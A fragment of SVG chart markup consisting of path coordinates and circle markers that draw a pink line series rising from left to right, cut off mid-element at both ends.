286.59788602941177 199.23710232533148 L 288.1259191176471 198.90978552533147 L 289.6539522058824 198.32938872533148 L 291.1819852941177 197.33912664533148 L 292.7100183823529 196.51810670933148 L 294.23805147058823 195.7426695893315 L 295.76608455882354 195.0981947093315 L 297.29411764705884 194.61054418133148 L 298.82215073529414 194.61054418133148 L 300.35018382352945 194.61054418133148 L 301.8782169117647 193.84808685866474 L 303.40625 192.72757254399812 L 304.9342830882353 192.31298310399814 L 306.4623161764706 191.8666375999981 L 307.9903492647059 191.21557889066452 L 309.51838235294116 191.03535317333126 L 311.04641544117646 189.70392149333125 L 312.57444852941177 188.68379301333124 L 314.1024816176471 186.29896600533124 L 315.6305147058824 184.60151848533127 L 317.1585477941177 182.09085832533128 L 318.6865808823529 181.34885973333127 L 320.21461397058823 180.45261909333124 L 321.74264705882354 179.64233685333124 L 323.27068014705884 178.83504539733127 L 324.79871323529414 177.7485312213309 L 326.32674632352945 176.9558846613309 L 327.8547794117647 175.6883428053309 L 329.3828125 174.62338216533092 L 330.9108455882353 173.07061352533088 L 332.4388786764706 171.78743221333093 L 333.9669117647059 170.78767997866427 L 335.4949448529412 170.0141396266643 L 337.02297794117646 168.63997738666427 L 338.55101102941177 167.44122079999752 L 340.0790441176471 166.65374003199753 L 341.6070772058824 165.75410723199752 L 343.1351102941177 165.33170339199754 L 344.6631433823529 165.33170339199754 L 346.19117647058823 165.04306787199752 L 347.71920955882354 164.73825299199754 L 349.24724264705884 164.00272614399753 L 350.77527573529414 163.79688774399753 L 352.30330882352945 163.79688774399753 L 353.8313419117647 163.79688774399753 L 355.359375 163.79688774399753 L 356.8874080882353 163.79688774399753 L 358.4154411764706 163.79688774399753 L 359.9434742647059 163.60221446399754 L 361.4715073529412 163.4567087573309 L 362.99954044117646 163.15658527999756 L 364.52757352941177 162.63092835199754 L 366.0556066176471 162.32943459199757 L 367.5836397058824 161.78606462933092 L 369.1116727941177 161.39250302933095 L 370.6397058823529 161.15966942933093 L 372.16773897058823 160.19757470933092 L 373.69577205882354 159.8962123733309 L 375.22380514705884 158.22240893866427 L 376.75183823529414 157.09466748799753 L 378.27987132352945 154.47904572799757 L 379.8079044117647 152.48935740799755 L 381.3359375 151.99776771199765 L 382.8639705882353 151.69312569599768 L 384.3920036764706 150.12692102399765 L 385.9200367647059 149.11445933866432 L 387.4480698529412 146.52967683199768 L 388.97610294117646 144.51849891199765 L 390.50413602941177 139.53462259199765 L 392.0321691176471 138.15426803199648 L 393.5602022058824 138.03481427199645 L 395.0882352941177 137.81540012799647" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.1453664 L 173.5234375 236.1453664 L 175.0514705882353 235.4907328 L 176.5795036764706 235.1667904 L 178.10753676470588 233.5639504 L 179.6355698529412 233.5639504 L 181.1636029411765 233.5639504 L 182.69163602941177 233.5639504 L 184.21966911764707 233.5639504 L 185.74770220588235 233.5639504 L 187.27573529411765 233.38810666666663 L 188.80376838235296 233.38810666666663 L 190.33180147058823 233.38810666666663 L 191.85983455882354 233.15178815999988 L 193.38786764705884 232.9347609599999 L 194.91590073529412 231.64236575999988 L 196.44393382352942 230.31214175999986 L 197.97196691176472 229.48097375999987 L 199.5 227.44621055999988 L 201.0280330882353 225.4114473599999 L 202.5560661764706 223.03249535999987 L 204.08409926470588 222.02053055999988 L 205.6121323529412 220.98556655999988 L 207.1401654411765 219.45739749333126 L 208.66819852941177 217.82756229333123 L 210.19623161764707 215.85691269333122 L 211.72426470588235 215.85691269333122 L 213.25229779411765 215.85691269333122 L 214.78033088235296 215.48167941333122 L 216.30836397058823 215.09834757333124 L 217.83639705882354 214.33978245333122 L 219.36443014705884 213.59741445333123 L 220.89246323529412 212.84424837333123 L 222.42049632352942 212.60804037333125 L 223.94852941176472 211.58762181333122 L 225.4765625 211.20698949333124 L 227.0045955882353 210.18927045333123 L 228.5326286764706 209.80458885333124 L 230.06066176470588 209.30258469333126 L 231.5886948529412 207.74766117333124 L 233.1167279411765 206.15874501333124 L 234.64476102941177 205.34854802133123 L 236.17279411764707 205.16735813333145 L 237.70082720588238 205.02964472533148 L 239.22886029411765 204.46477016533146 L 240.75689338235296 203.8998956053315 L 242.28492647058823 203.47049432533146 L 243.81295955882354 203.06354168533147 L 245.34099264705884 202.56008120533147 L 246.86902573529412 202.08968984533146 L 248.39705882352942 201.73470296533148 L 249.92509191176472 201.50051960533148 L 251.453125 201.45725624533148 L 252.9811580882353 201.45725624533148 L 254.5091911764706 201.3452261653315 L 256.0372242647059 201.12926456533148 L 257.56525735294116 200.84918936533148 L 259.09329044117646 200.8280549653315 L 260.62132352941177 200.7895654933315 L 262.1493566176471 200.65630155733135 L 263.6773897058824 200.5634877973314 L 265.2054227941177 200.49081387733136 L 266.7334558823529 200.43003521066487 L 268.26148897058823 200.334869631998 L 269.78952205882354 200.221045791998 L 271.31755514705884 200.15947779199809 L 272.84558823529414 200.0627789333315 L 274.37362132352945 200.0275880853315 L 275.9016544117647 199.69264632533148 L 277.4296875 199.69264632533148 L 278.9577205882353 199.69264632533148 L 280.4857536764706 199.69264632533148 L 282.0137867647059 199.69264632533148 L 283.54181985294116 199.69264632533148 L 285.06985294117646 199.69264632533148 L 286.59788602941177 199.23710232533148 L 288.1259191176471 198.90978552533147 L 289.6539522058824 198.32938872533148 L 291.1819852941177 197.33912664533148 L 292.7100183823529 196.51810670933148 L 294.23805147058823 195.7426695893315 L 295.76608455882354 195.0981947093315 L 297.29411764705884 194.61054418133148 L 298.82215073529414 194.61054418133148 L 300.35018382352945 194.61054418133148 L 301.8782169117647 193.84808685866474 L 303.40625 192.72757254399812 L 304.9342830882353 192.31298310399814 L 306.4623161764706 191.8666375999981 L 307.9903492647059 191.21557889066452 L 309.51838235294116 191.03535317333126 L 311.04641544117646 189.70392149333125 L 312.57444852941177 188.68379301333124 L 314.1024816176471 186.29896600533124 L 315.6305147058824 184.60151848533127 L 317.1585477941177 182.09085832533128 L 318.6865808823529 181.34885973333127 L 320.21461397058823 180.45261909333124 L 321.74264705882354 179.64233685333124 L 323.27068014705884 178.83504539733127 L 324.79871323529414 177.7485312213309 L 326.32674632352945 176.9558846613309 L 327.8547794117647 175.6883428053309 L 329.3828125 174.62338216533092 L 330.9108455882353 173.07061352533088 L 332.4388786764706 171.78743221333093 L 333.9669117647059 170.78767997866427 L 335.4949448529412 170.0141396266643 L 337.02297794117646 168.63997738666427 L 338.55101102941177 167.44122079999752 L 340.0790441176471 166.65374003199753 L 341.6070772058824 165.75410723199752 L 343.1351102941177 165.33170339199754 L 344.6631433823529 165.33170339199754 L 346.19117647058823 165.04306787199752 L 347.71920955882354 164.73825299199754 L 349.24724264705884 164.00272614399753 L 350.77527573529414 163.79688774399753 L 352.30330882352945 163.79688774399753 L 353.8313419117647 163.79688774399753 L 355.359375 163.79688774399753 L 356.8874080882353 163.79688774399753 L 358.4154411764706 163.79688774399753 L 359.9434742647059 163.60221446399754 L 361.4715073529412 163.4567087573309 L 362.99954044117646 163.15658527999756 L 364.52757352941177 162.63092835199754 L 366.0556066176471 162.32943459199757 L 367.5836397058824 161.78606462933092 L 369.1116727941177 161.39250302933095 L 370.6397058823529 161.15966942933093 L 372.16773897058823 160.19757470933092 L 373.69577205882354 159.8962123733309 L 375.22380514705884 158.22240893866427 L 376.75183823529414 157.09466748799753 L 378.27987132352945 154.47904572799757 L 379.8079044117647 152.48935740799755 L 381.3359375 151.99776771199765 L 382.8639705882353 151.69312569599768 L 384.3920036764706 150.12692102399765 L 385.9200367647059 149.11445933866432 L 387.4480698529412 146.52967683199768 L 388.97610294117646 144.51849891199765 L 390.50413602941177 139.53462259199765 L 392.0321691176471 138.15426803199648 L 393.5602022058824 138.03481427199645 L 395.0882352941177 137.81540012799647" fill="none" stroke="#ff0066" stroke-width="2"></path><circle cx="395.0882352941177" cy="137.81540012799647" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="393.5602022058824" cy="138.03481427199645" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="392.0321691176471" cy="138.15426803199648" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="390.50413602941177" cy="139.53462259199765" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="388.97610294117646" cy="144.51849891199765" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="387.4480698529412" cy="146.52967683199768" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="385.9200367647059" cy="149.11445933866432" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="384.3920036764706" cy="150.12692102399765" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="382.8639705882353" cy="151.69312569599768" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="381.3359375" cy="151.99776771199765" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="379.8079044117647" cy="152.48935740799755" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="378.27987132352945" cy="154.47904572799757" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="376.75183823529414" cy="157.09466748799753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="375.22380514705884" cy="158.22240893866427" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="373.69577205882354" cy="159.8962123733309" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="372.16773897058823" cy="160.19757470933092" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="370.6397058823529" cy="161.15966942933093" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="369.1116727941177" cy="161.39250302933095" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="367.5836397058824" cy="161.78606462933092" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="366.0556066176471" cy="162.32943459199757" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="364.52757352941177" cy="162.63092835199754" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="362.99954044117646" cy="163.15658527999756" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="361.4715073529412" cy="163.4567087573309" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="359.9434742647059" cy="163.60221446399754" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="358.4154411764706" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="356.8874080882353" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="355.359375" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="353.8313419117647" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="352.30330882352945" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="350.77527573529414" cy="163.79688774399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="349.24724264705884" cy="164.00272614399753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="347.71920955882354" cy="164.73825299199754" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="346.19117647058823" cy="165.04306787199752" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="344.6631433823529" cy="165.33170339199754" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="343.1351102941177" cy="165.33170339199754" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="341.6070772058824" cy="165.75410723199752" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="340.0790441176471" cy="166.65374003199753" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="338.55101102941177" cy="167.44122079999752" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="337.02297794117646" cy="168.63997738666427" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="335.4949448529412" cy="170.0141396266643" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="333.9669117647059" cy="170.78767997866427" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="332.4388786764706" cy="171.78743221333093" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="330.9108455882353" cy="173.07061352533088" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="329.3828125" cy="174.62338216533092" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="327.8547794117647" cy="175.6883428053309" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="326.32674632352945" cy="176.9558846613309" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="324.79871323529414" cy="177.7485312213309" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="323.27068014705884" cy="178.83504539733127" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="321.74264705882354" cy="179.64233685333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="320.21461397058823" cy="180.45261909333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="318.6865808823529" cy="181.34885973333127" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="317.1585477941177" cy="182.09085832533128" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="315.6305147058824" cy="184.60151848533127" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="314.1024816176471" cy="186.29896600533124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="312.57444852941177" cy="188.68379301333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="311.04641544117646" cy="189.70392149333125" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="309.51838235294116" cy="191.03535317333126" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="307.9903492647059" cy="191.21557889066452" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="306.4623161764706" cy="191.8666375999981" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="304.9342830882353" cy="192.31298310399814" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="303.40625" cy="192.72757254399812" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="301.8782169117647" cy="193.84808685866474" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="300.35018382352945" cy="194.61054418133148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="298.82215073529414" cy="194.61054418133148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="297.29411764705884" cy="194.61054418133148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="295.76608455882354" cy="195.0981947093315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="294.23805147058823" cy="195.7426695893315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="292.7100183823529" cy="196.51810670933148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="291.1819852941177" cy="197.33912664533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="289.6539522058824" cy="198.32938872533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="288.1259191176471" cy="198.90978552533147" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="286.59788602941177" cy="199.23710232533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="285.06985294117646" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="283.54181985294116" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="282.0137867647059" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="280.4857536764706" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="278.9577205882353" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="277.4296875" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="275.9016544117647" cy="199.69264632533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="274.37362132352945" cy="200.0275880853315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="272.84558823529414" cy="200.0627789333315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="271.31755514705884" cy="200.15947779199809" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="269.78952205882354" cy="200.221045791998" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="268.26148897058823" cy="200.334869631998" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="266.7334558823529" cy="200.43003521066487" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="265.2054227941177" cy="200.49081387733136" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="263.6773897058824" cy="200.5634877973314" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="262.1493566176471" cy="200.65630155733135" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="260.62132352941177" cy="200.7895654933315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="259.09329044117646" cy="200.8280549653315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="257.56525735294116" cy="200.84918936533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="256.0372242647059" cy="201.12926456533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="254.5091911764706" cy="201.3452261653315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="252.9811580882353" cy="201.45725624533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="251.453125" cy="201.45725624533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="249.92509191176472" cy="201.50051960533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="248.39705882352942" cy="201.73470296533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="246.86902573529412" cy="202.08968984533146" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="245.34099264705884" cy="202.56008120533147" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="243.81295955882354" cy="203.06354168533147" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="242.28492647058823" cy="203.47049432533146" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="240.75689338235296" cy="203.8998956053315" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="239.22886029411765" cy="204.46477016533146" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="237.70082720588238" cy="205.02964472533148" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="236.17279411764707" cy="205.16735813333145" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="234.64476102941177" cy="205.34854802133123" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="233.1167279411765" cy="206.15874501333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="231.5886948529412" cy="207.74766117333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="230.06066176470588" cy="209.30258469333126" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="228.5326286764706" cy="209.80458885333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="227.0045955882353" cy="210.18927045333123" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="225.4765625" cy="211.20698949333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="223.94852941176472" cy="211.58762181333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="222.42049632352942" cy="212.60804037333125" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="220.89246323529412" cy="212.84424837333123" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="219.36443014705884" cy="213.59741445333123" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="217.83639705882354" cy="214.33978245333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="216.30836397058823" cy="215.09834757333124" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="214.78033088235296" cy="215.48167941333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="213.25229779411765" cy="215.85691269333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="211.72426470588235" cy="215.85691269333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="210.19623161764707" cy="215.85691269333122" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="208.66819852941177" cy="217.82756229333123" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="207.1401654411765" cy="219.45739749333126" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="205.6121323529412" cy="220.98556655999988" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="204.08409926470588" cy="222.02053055999988" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="202.5560661764706" cy="223.03249535999987" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="201.0280330882353" cy="225.4114473599999" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="199.5" cy="227.44621055999988" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="197.97196691176472" cy="229.48097375999987" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="196.44393382352942" cy="230.31214175999986" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="194.91590073529412" cy="231.64236575999988" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="193.38786764705884" cy="232.9347609599999" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="191.85983455882354" cy="233.15178815999988" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="190.33180147058823" cy="233.38810666666663" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="188.80376838235296" cy="233.38810666666663" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="187.27573529411765" cy="233.38810666666663" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="185.74770220588235" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="184.21966911764707" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="182.69163602941177" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="181.1636029411765" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="179.6355698529412" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="178.10753676470588" cy="233.5639504" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="176.5795036764706" cy="235.1667904" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="175.0514705882353" cy="235.4907328" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="173.5234375" cy="236.1453664" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="171.99540441176472" cy="236.1453664" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="170.46737132352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="168.93933823529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="167.41130514705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="165.88327205882354" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="164.35523897058823" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="162.82720588235296" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="161.29917279411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="159.77113970588235" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="158.24310661764707" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="156.71507352941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="155.18704044117646" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="153.6590073529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="152.13097426470588" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="150.6029411764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="149.0749080882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="147.546875" cy="236.8" r="4" stroke="#333" 